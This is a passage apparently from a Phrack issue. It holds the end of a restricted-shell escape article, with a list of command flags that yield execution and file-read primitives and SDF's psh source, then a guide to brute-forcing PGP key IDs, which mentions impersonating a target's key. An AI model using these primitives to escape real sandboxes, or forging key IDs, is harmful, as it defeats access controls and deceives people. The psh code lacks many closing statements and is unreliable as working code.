configured, this can allow the user to provide a LD_PRELOAD environment
variable to the ssh session, bypassing the nologin shell.
--[ Conclusion
As you can hopefully see, setting up a restricted shell in a secure manner
is an almost impossible task. The nature of secure shells involves exposing
an untrusted user to code which was not designed to be trusted.
While there was not too much as far as technical content in this paper,
hopefully it has still provided you some entertainment, and some ideas you
can use in the future. I definitely encourage you all to play with some
restricted shells as, even if you do not need the functionality, they still
provide a fun free wargame.
Thanks go out to freeshell.org for your interesting wargame levels over the
years, as well as huku for your help with this.
--[ References
1) Restricted shells - Wikipedia -
2) http://www.freeshell.org
3) http://www.defensecode.com/public/
--[ Appendix A - Common commands with useful primitives
- vim :: Execution primitive
:set shell=/bin/bash
- arp -f <file> :: File read primitive
- iptables --modprobe=<cmd> :: Execution primitive
- tar --checkpoint-action=<cmd> :: Execution primitive
- rsync -e <cmd> :: Execution primitive
- scp -F <file> a b: :: File read primitive
- scp -S <command> a b: :: Execution primitive
- lynx 'e' :: File read/write in editor
- lynx ! :: Execute Primitive
- mail "~v" :: Execute primitive
--[ Appendix B - psh Source code
stty susp '' intr '' quit '' erase '^h'
export TERM=xterm-color
export SHELL=/dev/null
export LESSSECURE=true
export HISTORY=$HOME/.history
export EDITOR=/usr/pkg/bin/pico
export VISUAL=/usr/pkg/bin/pico
export MYTTY=`tty|cut -d/ -f3,4`
export SMALLTTY=`echo $MYTTY|cut -c4-5`
export MYIP=`echo $SSH_CLIENT|awk '{print $1}'`
if [ -f ${HOME}/.profile ]
then rm -f ${HOME}/.profile
exit 0
if [ -f ${HOME}/.kshrc ]
then rm -f ${HOME}/.kshrc
exit 0
if [ "$MYIP" = "" ]
then MYIP="x.x.x.x"
if [ -f $HOME/.pshrc ]
then BACKSPACE=`grep BACKSPACE $HOME/.pshrc|cut -d= -f2`
if [ "$BACKSPACE" != "" ]
then stty erase $BACKSPACE 1>/dev/null 2>/dev/null
echo "Validation is basically designed to protect us from spammers. There"
echo "are ways you can get validated by an SDF member. For instance if you"
echo "were a student and your professor taught a class here on SDF you"
echo "could gain validation through that class."
echo "If you were referred to SDF by a friend or a current SDF member,"
echo "they may be able to validate your new account for you. You can"
echo "usually find SDF egulars in either 'com' or 'irc'. Be sure to ask"
echo "them to help you."
echo "(continue)\c"
read continue
echo "Validating your account ensures our future! Please do it today."
echo "Remember, you make SDF what it is. Without you, we wouldn't exist."
echo " 1) Get a stamped envelope, a sheet of paper and ONE (1) US Dollar."
echo " 2) Write '$LOGNAME' clearly in the upper left hand corner of the"
echo "envelope."
echo " 3) Fold the donation inside a piece of paper and place inside the"
echo "envelope."
echo " OPTIONAL: Send TWO (2) US Dollars & SASE for an SDF Bumper Sticker."
echo " 4) Seal and mail to: SDF Public Access UNIX System"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo "Alternatively you may 'validate' your account via PAYPAL by clicking"
echo "on the"
echo "'DONATE' button at the bottom of the http://sdf.org website. The"
echo "paypal"
echo "minimum is \$3. Please include 'Validate $LOGNAME' in the Payment"
echo "For field."
#echo "We also accept BitCoin for validation:"
echo "17GQEeNNHYPmkdgzHmHXiyMaVfgrhPvGBQ"
echo "We also accept BitCoin - Please type 'bitcoin' for details."
echo "You may also credit the validation fee towards 'arpa' membership"
echo "should"
echo "you decide to join 'arpa' within 30 days of validating your account."
echo "(continue)\c"
read continue
echo "To see what you get as a validated member, type 'user'"
echo "For Lifetime ARPA membership to SDF via paypal, type 'arpa'"
echo "To see a list of UNIX commands you can use *NOW*, type 'unix'"
echo "To view user contributed tutorials, visit http://sdf.org/?tutorials"
echo "US Military Personnel, please type 'mil'"
echo " what - what can I use this account for?"
echo " unix - a listing of UNIX commands available to you NOW"
echo " how - information on increasing membership"
echo " teach - using SDF in a classroom setting"
echo " dialup - information about SDF dialup service"
echo " arpa - about lifetime arpa membership"
echo " bboard - sdf user message boards"
echo " commode - chat with other users online"
echo " ysm - chat on the ICQ network"
echo " bsflite - chat on the AIM network"
echo " msnre - chat on the MSN network"
echo " ttytter - listen to Twitter tweets anonymously"
echo " lynx - browse the WWW textually or access GOPHER"
echo " bksp - set your BACKSPACE key"
echo " faq - frequently asked questions"
echo " software - display software programs installed on the system"
echo " quote - get a real time stock quote"
echo " games - a listing of available games"
echo " thxmoo - connect to the THXMOO"
echo " mud - connect to the SDFmud"
#echo " delme - delete your free account"
echo " validate - gain additional shell access (also try 'user' for"
echo "details)"
echo "Basic movement in $1:"
echo "j - down (or rotate)"
echo "k - up (or rotate)"
echo "h - left"
echo "l - right"
echo "q or Q to quit"
echo "[RETURN]\c"
read ret
case `uname -n` in
ol) /usr/local/bin/maint
kill -9 0 ;;
mx) echo
echo "mx is reserved for mail service only."
echo "Please use 'tty.sdf.org' to connect to SDF."
sleep 5
kill -9 0 ;;
sverige) echo
echo "sverige is reserved for MetaARPA members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
sleep 5
kill -9 0 ;;
vinland) echo
echo "vinland is reserved for VHOST members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
sleep 5
kill -9 0 ;;
#echo "Would you like to VALIDATE your account now? (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 121|89) echo "YES"
# Validate ; echo "[RETURN]\c";read return;;
# *) echo "NO" ;;
echo "Please press your BACKSPACE key: \c"
stty raw
dd of=.$$ count=1 1>/dev/null 2>/dev/null
stty -raw
stty erase `head -1 .$$` 2>/dev/null
rm -f .$$
#echo "Enable Colours: (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 89|121) COLOR=TRUE
# touch -f $HOME/.color ;;
echo "===================================================================="
echo "SDF host uptime report for Seattle WA, Dallas TX (USA) and Germany"
echo " Please use 'tty.sdf.org' for general access"
echo "===================================================================="
/usr/local/bin/ruptime -a
echo "(continue)\c"
read return
echo "(continue)\c"
read return
/usr/pkg/bin/guestbook -l 50
echo "\nType 'help' for Commands."
echo "Type 'com' to chat with other users."
echo "Type 'ttytter' to listen to Twitter Tweets anonymously."
echo "Type 'mud' to play the SDFmud."
case `url $LOGNAME` in
*.*.*) echo "\nYour website is http://`url ${LOGNAME}|awk '{print $1}'`"
echo "with files in $HOME/html\n" ;;
*) echo "Type 'mkhomepg' to set up your personal website.\n"
case `echo $RANDOM|cut -c1` in
1|2|3|4|5) echo "Did you know you can become a permanent LIFETIME member"
echo "of SDF"
echo "by making a onetime donation of \$36? Type 'arpa' for more info!\n" \
6|7|8|9) echo "Did you know you can validate your account and gain weekend"
echo "IRC access"
echo "by making a donation of \$1 to \$3? Type 'validate' for more"
echo "info!\n" ;;
/usr/pkg/bin/dues -p
PROMPT="`uname -n`"
while true
if [ ! -d $HOME ]
then echo "You may have become an ARPA member."
echo "The update is now taking place and may require 2 or 3 minutes to"
echo "complete. You will now be logged out. When you reconnect, please"
echo "use ssh to connect to 'tty.sdf.org' for load balancing."
echo "[RETURN]\c"
read return
kill -9 0
if [ -f $HOME/.mailcap ]
then rm -f $HOME/.mailcap
if [ "$COLOR" = "TRUE" ]
thene echo "$PROMPT:`pwd`> \c"
read command
arg=`echo ${command}|awk '{print $2,$3,$4,$5,$6}'`
#if [ "$ccount" -gt "6" ]
#then echo "\nPlease 'validate' or join 'arpa' today."
# echo "Your membership ensures our future!!\n"
# ccount=0
#else ccount=`expr $ccount + 1`
echo "[`date +"%d-%b-%y %H:%M:%S"` $MYIP $MYTTY $PROMPT] $PWD $command" \
2>/dev/null >>$HISTORY
case `echo $command|awk '{print $1}'|tr A-Z a-z` in
tty) tty;;
stty) stty;;
lock) lock;;
ulimit) ulimit;;
uname*) uname `echo ${command}|awk '{print $2}'` ;;
echo*) shift ${command}
echo "${command}" ;;
how) /usr/local/bin/how;;
cal*) /usr/pkg/bin/cal `echo $command|awk '{print $2}'` ;;
what) /usr/local/bin/newbie
passwd*|chfn*|chsh*|maint) /usr/local/bin/passwd ;;
url*) url=`echo $command|awk '{print $2}'`
url $url;;
gopher*) site=`echo $command|awk '{print $2}'`
if [ "$site" = "" ]
then lynx -anonymous -restrictions=all gopher://sdf.lonestar.org
else lynx -anonymous -restrictions=all $site
bksp*) bksp=`echo $command|awk '{print $2}'`
if [ "$bksp" = "" ]
then echo "\nTo set your backspace key, type 'bksp' then press your"
echo "actual key and then press return.\n"
else stty erase $bksp
echo "BACKSPACE=$bksp" > $HOME/.pshrc
bitcoin*) /usr/local/bin/bitcoin ;;
sftp*|ftp*) echo "\nPlease 'validate' your account to FTP files to and"
echo "from your SDF account.\n" ;;
tar*|make|cc*|tf*|gcc*|g++*|perl*|python*|ruby*|*configure*|netstat*| \
echo "\nTo use this feature, please join the SDF 'arpa' membership"
echo "ARPA membership is available to you for a one time donation of only"
echo "\$36."
echo "Your membership ensures our future! Type 'arpa' for details.\n"
getdialup*) npa=`echo $command|awk '{print $2}'`
/usr/local/bin/getdialup $npa ;;
setdialup) echo "Please validate your account first. For now you can use"
echo "'getdialup' to find access numbers in your area." ;;
phlog|deskshots|sdfers) echo "Please validate your account first." ;;
dialup) /usr/local/bin/dialup ;;
games) /usr/local/bin/games ;;
mud) /usr/pkg/bin/mud ;;
war) /sys/sdf/bin/war ;;
warsetup) /sys/sdf/bin/warsetup ;;
thxmoo) /usr/pkg/bin/thxmoo ;;
bj) /usr/pkg/games/bj;;
lander) /usr/pkg/games/lander;;
othello) /usr/pkg/games/othello;;
advent) /usr/pkg/games/advent;;
zork) /usr/pkg/games/advent;;
tttt) /usr/pkg/games/tttt;;
moon) /usr/pkg/bin/moon-buggy;;
tetrinet) if [ "$LINES" -lt "50" ]
then echo "% tetrinet requires your TTY to be at least 50 lines."
sleep 2
tetrinet $LOGNAME tetrinet.sdf.org
tess) /usr/pkg/games/tess;;
c4) /usr/pkg/games/c4;;
ski) /usr/pkg/games/ski;;
knight) /usr/pkg/games/knight;;
suicide) /usr/pkg/games/suicide;;
dinkum) /usr/pkg/games/dinkum;;
aybabtu) /usr/local/bin/aybabtu;;
barnacle) /usr/pkg/bin/barnacle;;
invaders) /usr/pkg/games/invaders
stty sane ;;
life) /usr/pkg/bin/life /usr/pkg/share/life/tiny.life ;;
order) echo "Please validate your account first.";;
ysm) /usr/pkg/bin/ysm;;
micq) /usr/pkg/bin/rmicq;;
bsflite) /usr/pkg/bin/bsflite;;
msnre) /usr/pkg/bin/msnre;;
dopewars) dopewars;;
zombies) Move $command
snake) Move $command
wanderer) Move $command
worm) Move $command
greed) Move $command
tetris) Move $command
sokoban) Move $command
robots) Move $command
torus) Move $command
mazewar) /usr/local/bin/mazewar;;
mdg) /usr/local/bin/mdg
if [ "$?" != "0" ]
then echo "\nMDG might not be running at the moment"
echo "Please try again later."
dict*) args=`echo $command|awk '{print $2}'`
dict $args
quote*) args=`echo $command|awk '{print $2}'`
quote $args
cal*) args=`echo $command|awk '{print $2}'`
cal $args
domains) /usr/local/bin/domains ;;
unix) unix ;;
linux) linux;;
dig*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" "$8}'`
dig $domain
host*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" \
host $domain
geoip*) domain=`echo $command|awk '{print $2}'`
geoip $domain
whois*) domain=`echo $command|awk '{print $2}'`
jwhois $domain
nslookup*) domain=`echo $command|awk '{print $2}'`
nslookup $domain
pkg_info) pkg_info 2>/dev/null|sort|more ;;
lynx*restrict*) echo $command|mailx -s "$LOGNAME" smj;;
lynx*) url=`echo $command|awk '{print $2}'`
if [ "$url" = "" ]
then lynx -anonymous -restrictions=all http://sdf.lonestar.org
else case $url in
http:*) ;;
*) url="http://$url" ;;
lynx -anonymous -restrictions=all $url
edit*|vi*|pico*|emacs*) file=`echo $command|awk '{print $2}'`
if [ "$file" = "" ]
then echo "usage: edit {file}"
else case $file in
*../*|*.kshrc*|*.bashrc*|*.pshrc*|*.muttrc*|*.telnet*|*.mailcap*|*. \
forward*|*.plan*|*.cfg*|*.history*) echo "usage: edit {file}";;
*) /usr/pkg/bin/pico -t -b -o $HOME $PWD/$file ;;
man*) man `echo $command|awk '{print $2}'`;;
rm*) target=`echo $command|awk '{print $2}'`
if [ "`echo $command|awk '{print $3}'`" != "" ] || [ "$target" = "" ]
then echo "usage: rm {filename}"
else case $target in
*.history*|*psh*|*.hushlogin*) echo "Can't remove $target";;
*) if [ -d $target ]
then rm -rf $target
else rm $target
mv*) oldname=`echo $command|awk '{print $2}'`
newname=`echo $command|awk '{print $3}'`
if [ "`echo $command|awk '{print $4}'`" != "" ] || [ "$oldname" = "" ] || \
[ "$newname" = "" ]
then echo "usage: mv {oldfile} {newfile}"
else case $oldname$newname in
*.muttc*|*.kshrc*|*.mailcap*|*.telnet*|*.plan*|*html*|*.forward*|*. \
history*|*psh*|*.hushlogin*|*.cfg*) echo "Cant move $oldname to $newname";;
*) mv $oldname $newname ;;
ping*) /sbin/ping -c5 `echo $command|awk '{print $2}'`;;
teach) cat ~ftp/pub/sdf/faq/TEACH/01;;
traceroute*) traceroute `echo $command|awk '{print $2}'` & ;;
games) games;;
disk) disk;;
df*) df `echo $command|awk '{print $2}'` ;;
oneliner) /usr/pkg/bin/oneliner;;
rogue) /usr/pkg/games/rogue ;;
hack) /usr/pkg/games/hack ;;
nethack) /usr/pkg/bin/nethack ;;
hunt*) echo
echo "hunt commands:"
echo "j - down"
echo "k - up"
echo "h - right"
echo "l - right"
echo "1 - gun"
echo "2 - grenade"
echo "3 - bomb"
echo "q - quit"
echo "the shift key plus j,k,h or l changes direction"
/usr/pkg/games/hunt `echo $command|awk '{print $2}'`;;
upload) echo "press CTRL-X several times to abort."
lrz -y;;
mkdir) directory=`echo $command|awk '{print $2}'`
case $directory in
*html*|*.plan*) echo "usage: mkdir {name}";;
*) mkdir $directory;;
#mkhomepg*|mkhome*) mkhomepg `echo $command|awk '{print $2}'`;;
mkhomepg*|mkhome*) echo "mkhomepg has been temporarily disabled for"
echo "prevalidated users." ;;
vhost) echo
echo " As a lifetime ARPA member, you can increase your membership level"
echo " so that you may virtually host your own domain name on SDF. This"
echo " includes DNS, mail service and virtual webhosting. For more info"
echo " check out the FAQ: file"
echo ;;
help) Menu;;
profiles) /usr/pkg/bin/profiles ;;
#freeirc) echo "% 'freeirc' is available to ALL validated users from"
echo "Friday 23:59:59"
# echo " through Monday 00:00:01 UTC. Please 'validate' your account"
# echo "today!" ;;
user) echo "\nValidated users (\$1.00 or more) have immediate access to:\n"
echo " 200mb total (home, web, mail & gopher)"
echo " incoming file transfers via ftp or sftp"
echo " elm, pine, mutt, mailx, rmail, pop3, gopher"
echo " bash, ash, ksh, tcsh, rc, zsh, tclsh"
echo " your URL http://$LOGNAME.freeshell.org"
echo " limited cgi execution (shell scripts)"
echo " icq, aim, talk, commode, bboard"
echo " dialup ppp/shell access in the US and Canada"
echo " USENET and ClariNET read/post access"
echo " freeirc on Saturdays and Sundays"
echo " hundreds of UNIX utilities"
echo "The purpose of the prevalidated account is to help newusers"
echo "learn about the UNIX system. Type 'unix' to see what UNIX"
echo "commands are available to you right now. You can validate"
echo "your account today! type 'validate' to validate\n";;
env) env;;
set) set;;
#delme) delme;;
bboard) /usr/pkg/bin/bboard;;
eggdrop*) echo "% eggdrop is available to MetaARPA members only" ;;
psybnc*) echo "% psybnc is available to MetaARPA members only" ;;
arpa|join|member) arpa;;
auction) auction;;
cat*|more*|less*) file=`echo $command|awk '{print $2}'`
case $file in
*psh*) file="" ;;
*random*|*null*|*zero*) echo "% Ja tvoi sluga ja tvoi rabotnik";file="" ;;
if [ "$file" = "" ]
then echo "usage: cat {filename}"
else if [ "`wc -l $file|awk '{print $1}'`" -ge "500" ]
then tail -500 $file
else cat $file
software*) /usr/local/bin/software `echo $command|awk '{print $2}'` ;;
cd*) cd `echo $command|awk '{print $2}'`;;
finger*) user=`echo $command|awk '{print $2}'`
case ${user} in
*-*) user=root ;;
size=`ruptime -a|awk 'END {print $1}'`
if [ "$user" = "" ]
then echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)"
else finger -m $user
fi ;;
date) date ;;
whereis*) whereis `echo $command|awk '{print $2}'`;;
locate*) locate `echo $command|awk '{print $2}'` ;;
whoami*) /usr/bin/whoami ;;
size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;
uptime|ruptime*) ruptime -a;;
chmod*) chmod `echo $command|awk '{print $2" "$3}'` ;;
ls*|ll*|dir*) if [ "$COLOR" = "TRUE" ]
then /usr/pkg/bin/colorls -a `echo $command|awk '{print $2}'|tr R r`
else ls -a `echo $command|awk '{print $2}'|tr R r`
fi ;;
sl*) /usr/pkg/bin/sl ;;
pwd) pwd;;
msg) msg ;;
# ps*) ps `echo $command|awk '{print $2}'` ;;
validate) Validate ;;
mil) /usr/local/bin/mil ;;
why) echo
echo "It didn't used to be this way .. but you must understand that your"
echo "small token of trust builds a better SDF for all of us:"
echo "Due to the increased number of security and spam attacks, we are now"
echo "asking that you send ONE US Dollar (or 5 EURO note) as a token of"
echo "your sincerity in becoming a longterm member of our community. It is"
echo "unfortunate that the net has become filled with people whose daily"
echo "goal in life is to terriorize others online. We believe that asking"
echo "for ONE US Dollar would not present a burden"
echo "to anyone in the world. We hope to keep SDF a safe and secure haven"
echo "for you and other shell users. To get an SDF bumper sticker, send in"
echo "TWO US Dollars and a SASE (Self-Addressed Stamped Envelope). Please"
echo "include your username."
echo " SDF public access UNIX system"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
w*) size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;
alpine*|pine*|mail*|mutt*|elm*) case `echo $command|awk '{print $2}'` in
-*) echo "unknown mail flag." ;;
*) mutt -F /sys/pkg/etc/rmuttrc ;;
#tetrinet $LOGNAME tetrinet.sdf.org ;;
echo "-=- Basic IRC Commands -=-"
echo "/list - List channels"
echo "/join #channel - Join a channel"
echo "/list #channel - Leave a channel"
echo "/msg nick msg - Send a private message"
echo "/who - Who is on"
echo "/quit - Quit IRC"
echo "-(continue)-\c"
read ret
/usr/pkg/bin/oirc -p 7000 ${LOGNAME} irc.sdf.org
#/usr/pkg/bin/oirc -p 6667 ${LOGNAME} irc.sdf.org
echo ;;
com|chat|commode) \
room=`/usr/pkg/bin/comwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/com ;;
pcom|pcommode) room=`/usr/pkg/bin/pcomwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/pcom ;;
ttytter*|twitter*) echo "% Twitter username (or [RETURN] for anonymous):\c"
read tweet
if [ "$tweet" = "" ]
then echo "% Logging in anonymously"
/usr/local/bin/ttytter -anonymous
else /usr/local/bin/ttytter -user=$tweet
fi ;;
w2k) /usr/local/bin/w2k ;;
mkgopher) mkgopher;;
faq) faq;;
clear) clear;;
usenet|trn*|tin*|slrn*|nn*|rn*) echo "% USENET is available to validated"
echo "users." ;;
die) echo "you has failed."
sleep 4
exit 0 ;;
#echo "Would you like to remove your account from our system? (y/n) \c"
#read ans
# case $ans in
# y*|Y*) delme ;;
# *) echo "% '$LOGNAME' will not be deleted." ;;
# esac
echo "Good Bye from the S D F - 1 .."
echo "Please 'validate' or join 'arpa' soon."
echo "Your support is appreciated!"
echo "Thank you!"
sleep 8
exit 0;;
uinfo|expire) uinfo;expire ;;
dues) /usr/pkg/bin/dues ${arg} ;;
#helpdesk) /usr/pkg/bin/helpdesk ;;
guestbook) /usr/pkg/bin/guestbook ;;
id*) /usr/bin/id ${arg} ;;
nospam) echo "You must be validated to use this feature."
*) if [ "$command" != "" ]
then echo "psh: $command: not found - try 'help' for commands"
else if [ "$count" -gt "20" ]
then exit 0
else count=`expr $count + 1`
doneecho "
|=[ 0x04 ]=---=[ Personalized PGP Key IDs - f1los0tt1l3 ]=---------------=|
|=-----------=[ Personalized PGP Key IDs for fun and profit ]=-----------=|
|=---------------------------=[ f1los0tt1l3 ]=---------------------------=|
---[ Contents
1 - Introduction
1.1 - Prior work
2 - The spec
3 - The attack
3.1 - Preparation
3.2 - The crash
3.2.1 - Runtime stats
3.3 - The patch
4 - Conclusion
5 - References
6 - Code
---[ 1 - Introduction
Everybody should be allowed to have his (or someone's) own PGP key ID. Who
doesn't want his PGP key to match his favorite hex nickname or his
target's key for some cheap social engineering? I certainly want, so I
started researching how they are derived and if they could be bruteforced.
Note: when we speak about key IDs here we mean the 4-byte short ones that
everybody love to use. However, given enough processing power (or maybe a
SHA1 ASIC|preimage attack) the process can obviously scale to any key ID
-----[ 1.1 - Prior work
GIYF, right? Well, a couple people tried this and lived to tell the tale
(or, well, decided to make it public) but none of them permitted me to get
a 4096 bit RSA key as I wanted it.
In May 2010, halfdog posted on full-disclosure [1] some Java code that
worked on DSA keys. Not exactly fast or customizable, but hey, it was 3
years ago.
Then, in Dec 2011, Asheesh, a Debian dev particularly fond of his key ID,
found a way to create a new RSA 4096 key with that ID (and a bug in GnuPG
handling of duplicate keys) [2]. He highlighted the disruptive potential
of that and decided not to release the code. Bummer.
But the keyservers carry even older evidence (even if one shouldn't trust
the key creation field, especially on these keys): the first example of
custom IDs I could find is
pub 1024R/A69AB99CDEADBEEF 1995-09-28
that actually employs a old packet type.
So we are not doing anything truly new, but there's still not a public
method to get an arbitrary key with an arbitrary key ID.
---[ 2 - The spec
So, let's get our hands dirty: grab the OpenPGP spec, RFC 4880 [3], and
look up how are those key IDs derived [RFC 4880 - 12.2].
--------------[ RFC 4880 - 12.2. Key IDs and Fingerprints ]---------------
For a V3 key, the eight-octet Key ID consists of the low 64 bits of
the public modulus of the RSA key.
Woah, that easy? No, it's not. Version 3 keys are deprecated [RFC 4880 -
5.5.2], for a bad reason - key IDs collisions, ahem - and a good reason -
MD5. So, as we don't want to build our new shiny RSA 4098 on MD5, let's
move on to V4 keys.
--------------[ RFC 4880 - 12.2. Key IDs and Fingerprints ]---------------
A V4 fingerprint is the 160-bit SHA-1 hash of the octet 0x99,
followed by the two-octet packet length, followed by the entire
Public-Key packet starting with the version field. The Key ID is the
low-order 64 bits of the fingerprint.
Great, so what's in a Public-Key packet?
-------------[ RFC 4880 - 5.5.2. Public-Key Packet Formats ]--------------
A version 4 packet contains:
- A one-octet version number (4).
- A four-octet number denoting the time that the key was created.
- A one-octet number denoting the public-key algorithm of this key.
- A series of multiprecision integers comprising the key material.
Note: numbers are big-endian [RFC 4880 - 3.1]
So the variable parts are the creation timestamp and the key material. The
key material is a bunch of algorithm-specific MPI [RFC 4880 - 3.2] which
can't be tampered with without changing their value.
One might also try to add garbage to the packet, but implementations strip
it. Bummer.
---[ 3 - The attack
Great, we know what constitutes the key ID, and we know that we can tamper
with the key creation value and/or with the RSA/DSA/Elgamal parameters. I
decided to only loop through the key creation field for a simple reason: I
don't trust a crappy tool written by me with RSA primes selection, in
particular in a scenario like this where a lot of different primes are
needed, as skews can lead to disastrous consequences [4].
After all entropy usage couldn't be optimized much and at least this way
we have the peace of mind of GnuPG generated keys.
So we will simply build a bruteforce on the key creation timestamp value.
-----[ 3.1 - Preparation
Ok, let's dive in. First of all fence your GnuPG env, to avoid cluttering
or damaging your own.
$ mkdir -m 700 GNUPGHOME && export GNUPGHOME=`pwd`/GNUPGHOME
Now we need to generate a pool of enough keys to have a fair chance of
finding a match, but how many? Well, obviously it depends on the number of
seconds in the time frame we consider acceptable for the key creation time.
Let's dive into some math. Since SHA1 is unbiased each try is independent
and for each try we have a fixed probability of finding a match: one into
the number of different possible suffixes = 1 / 2^32.
So, the only thing that matters is how many tries we can do. This number
is s (seconds in the time frame) * x (number of keys in the pool).
The probability of finding a match in k tries is 1 less the probability of
failing all of them [5] and this last is (prob of failing one) ^ k =
((2^32 - 1) / 2^32) ^ k.
Here are the final formula and a handy table:
2^32 - 1 s * x s = seconds in the time frame
y = 1 - ( -------- ) x = number of keys in the pool
2^32 y = probability of a success
| frame \ prob | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
| past | 3 | 5 | 8 | 10 | 15 |
| 5y | 19 | 38 | 63 | 82 | 126 |
| 1y | 95 | 189 | 314 | 408 | 628 |
For a fancy 3D graph you can plot the probability on a (years in the time
frame X keys in the keypool) space [6]:
y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x)
GnuPG has a convenient function to generate keys in batch mode:
$ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
--keyring ./pubpool.gpg --trustdb-name ./trustpool.gpg \
--gen-key --batch batchfile.txt
# batchfile.txt
Key-Type: RSA
Key-Length: 4096
Name-Real: Filippo Valsorda
Name-Comment: f1los0tt1l3
Name-Email: f1los0tt1l3@phrack.com
Expire-Date: 0
Note: it does not matter what you set in the Name-* fields, as we are
going to discard the uid to create a validly signed one later.
Set it to run the number of times you want, maybe plug in haveged [7], a
Geiger or a radio producing white noise and... uh, go grab a coffee.
-----[ 3.2 - The crash
Well, now we have our keypool and we need to bruteforce the key ID out of
it. I wrote a Python 3 + Cython parallelizable implementation, crash.py.
Compile the Cython module with (you'll need Cython and OpenMP):
$ python3 setup.py build_ext --inplace
Note: clang and old gcc versions panicked, I used gcc 4.7.
Then start the bruteforce with
$ python3 crash.py pubpool.gpg NEWKEYID [0xTIMESTAMP]
where 0xTIMESTAMP is the lowest limit to the creation time, if any.
Want to know something cool? The only thing needed to do the bruteforce is
the pubpool, so you can export it out of your crappy airgapped system and
perform the number crushing on some powerful untrusted machine.
You will hopefully get a result like this
Current fingerprint: 9b179a2af2f8a744b2214de4eec578f57e61d52a
Current timestamp: 0x512187c9
NEW fingerprint: d8efd70f8479432e9158ac27eb56af7c42424242
RESULT timestamp: 0x1b550652
------[ 3.2.1 - Runtime stats
The bulk of the heavy-lifting involved in this bruteforce is making the
SHA1 hashes, and one of them is done for each timestamp tried. The number
of tries is clearly independent of the width of the time frame, and grows
with the probability of finding a match. The two - probability and tries -
are bound by a simplified version of the formula above.
2^32 - 1 x
y = 1 - ( -------- ) x = tries / SHA1 hashes
2^32 y = probability of a success
So what matters here is what SHA1 hashrate we manage to get. The crash.py
Cython implementation is quite fast, and achieves 3.0 * 10^6 h/s on a
quad-core 2.3 GHz i7 or 8.3 * 10^6 h/s on a AWS EC2 cc2.8xlarge instance.
Note: this means that a matching key would cost you $0.50 of Spot Instance
as of April 2013.
However, much better can be done: the oclHashcat-plus guys claim a 3.081 *
10^9 SHA1/s on a AMD hd6990 GPU [8]. With an hashrate like that, a match
can be found in a matter of seconds. Writing a high-performance CUDA or
OpenGL implementation is left as an exercise to the reader ;)
Here is a reference table of running times:
| probability | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
| tries / 10^9 | 2.9 | 5.9 | 9.8 | 12.8 | 19.7 |
| runtime on i7 | 17m | 33m | 55m | 71m | 110m |
| runtime on EC2 | 6m | 12m | 20m | 26m | 40m |
| runtime on GPU | 1s | 2s | 3s | 4s | 6s |
-----[ 3.3 - The patch
Now we have to patch the key. patch.py, incredibly, does exactly so.
First, export the secret key for which you had the match
$ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
--keyring ./pubpool.gpg --export-secret-keys OLDKEYID > privkey.gpg
Then run patch.py on it, passing it the "RESULT timestamp" from crash.py:
$ python3 patch.py privkey.gpg TIMESTAMP > resultkey.gpg
Finally, force gpg to import the key even if the (invalid) bounding
signature has been stripped:
$ gpg --allow-non-selfsigned-uid --import resultkey.gpg
And restore the bounding signature by creating a new uid:
$ gpg --edit-key NEWKEYID
gpg> adduid
gpg> uid 1
gpg> deluid
gpg> trust
gpg> check
gpg> save
Note: don't create the new uid as an exact copy of the old, otherwise
deluid will delete both of them from the secret key - it's a GnuPG bug.
Done! You now have your new shiny PGP key with a personal key ID. Export
it to your main GnuPG env or whatever.
---[ 4 - Conclusion
Have fun, there are still many interesting uncatched key IDs out there:
0x11111111, 0xabaddeed, 0xaaaaaaaa, 0xg00d1dea, 0x27182818, 0x14142135...
Please just leave 0x31415926, 0x42424242 and 0x13371337 for me ;) and
don't (publicly) duplicate other people's keys.
Finally, I know what you are searching for: the option is --keyid-format
long ;)
---[ 5 - References
[1] "PGP CPU time wasta (never refer to pgp key using 32bit key-id)"
[2] "Short key IDs are bad news (with OpenPGP and GNU Privacy Guard)"
[3] "OpenPGP Message Format" - Callas, et al - November 2007
[4] "Cryptanalysis of RSA with Small Prime Difference" - B de Weger - 2002
[5] Complementary event - Wikipedia
[6] y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x) with a
from 1 to (2013 - 1970) with x from 1 to 200 - Wolfram|Alpha
[7] haveged - A simple entropy daemon
[8] oclHashcat-plus - advanced password recovery | Performance section
---[ 6 - Code
begin 644 gpg-crash.tar.gz
|=[ 0x05 ]=---=[ How to cheat at maths - chown ]=------------------------=|
|=----------------------=[ How I Cheat at Maths - Z3 101 ]---------------=|
|=-------------------------------=[ by chown ]=--------------------------=|
--[ Introduction
Welcome reader. I am writing this small text because it has recently come
to my attention that a lot of people significantly smarter than me are
intimidated by the mention of Z3 and solvers in general, and avoid using
them. I think it is a common mentality that Z3 requires some kind of maths
degree as a prerequisite for its use, however for me it is the complete
Hopefully by the end of this small guide you will see that Z3 can provide a
trivial platform with which you can avoid doing most of the complex math
work which is associated with exploit development and reverse engineering.
--[ What is Z3?
Z3 is an SMT (satisfiability modulo theories) solver written by Microsoft
Research. It is cross platform, (Windows/Linux/Mac OS X) and free (MIT
Internally at Microsoft it is used for program analysis and verification.
Z3 exposes either a C or Python based API, with a rich set of features. In
this paper we will only scratch the surface of the Python API. I feel this
is the simplest way to jump right in and instantly get value from Z3 with
almost no learning curve required. There is a lot of documentation on the
